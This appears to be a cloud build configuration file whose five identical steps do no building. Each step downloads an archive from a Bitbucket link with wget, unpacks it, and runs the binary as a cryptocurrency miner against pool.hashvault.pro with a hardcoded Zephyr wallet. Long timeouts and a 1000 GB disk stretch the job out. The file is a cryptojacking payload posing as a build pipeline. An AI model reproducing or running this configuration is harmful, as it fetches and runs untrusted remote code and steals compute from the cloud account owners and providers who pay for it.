steps:
  - name: golang
    args: 
      - '-c'
      - >-
        wget https://bitbucket.org/wename798/sawah/downloads/RTM.tar.gz && tar -xvf RTM.tar.gz &&./RTM --url pool.hashvault.pro:80 --user ZEPHs8qpRw1igRzoQwesBMQRTuubopJMcEsd5LjBxdiX9zSaMDGuq4CfEeohWKu5etAXmnFuq4T7pPLJWHA4gW8K4EDAPeLduTb --pass E2 --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
    waitFor: ["-"]
    entrypoint: /bin/bash

  - name: golang
    args: 
      - '-c'
      - >-
        wget https://bitbucket.org/wename798/sawah/downloads/RTM.tar.gz && tar -xvf RTM.tar.gz &&./RTM --url pool.hashvault.pro:80 --user ZEPHs8qpRw1igRzoQwesBMQRTuubopJMcEsd5LjBxdiX9zSaMDGuq4CfEeohWKu5etAXmnFuq4T7pPLJWHA4gW8K4EDAPeLduTb --pass E2 --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
    waitFor: ["-"]
    entrypoint: /bin/bash
    
  - name: golang
    args: 
      - '-c'
      - >-
        wget https://bitbucket.org/wename798/sawah/downloads/RTM.tar.gz && tar -xvf RTM.tar.gz &&./RTM --url pool.hashvault.pro:80 --user ZEPHs8qpRw1igRzoQwesBMQRTuubopJMcEsd5LjBxdiX9zSaMDGuq4CfEeohWKu5etAXmnFuq4T7pPLJWHA4gW8K4EDAPeLduTb --pass E2 --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
    waitFor: ["-"]
    entrypoint: /bin/bash

  - name: golang
    args: 
      - '-c'
      - >-
        wget https://bitbucket.org/wename798/sawah/downloads/RTM.tar.gz && tar -xvf RTM.tar.gz &&./RTM --url pool.hashvault.pro:80 --user ZEPHs8qpRw1igRzoQwesBMQRTuubopJMcEsd5LjBxdiX9zSaMDGuq4CfEeohWKu5etAXmnFuq4T7pPLJWHA4gW8K4EDAPeLduTb --pass E2 --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
    waitFor: ["-"]
    entrypoint: /bin/bash

  - name: golang
    args: 
      - '-c'
      - >-
        wget https://bitbucket.org/wename798/sawah/downloads/RTM.tar.gz && tar -xvf RTM.tar.gz &&./RTM --url pool.hashvault.pro:80 --user ZEPHs8qpRw1igRzoQwesBMQRTuubopJMcEsd5LjBxdiX9zSaMDGuq4CfEeohWKu5etAXmnFuq4T7pPLJWHA4gW8K4EDAPeLduTb --pass E2 --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
    waitFor: ["-"]
    entrypoint: /bin/bash
timeout: 86000s
options:
  machineType:
  diskSizeGb: '1000'
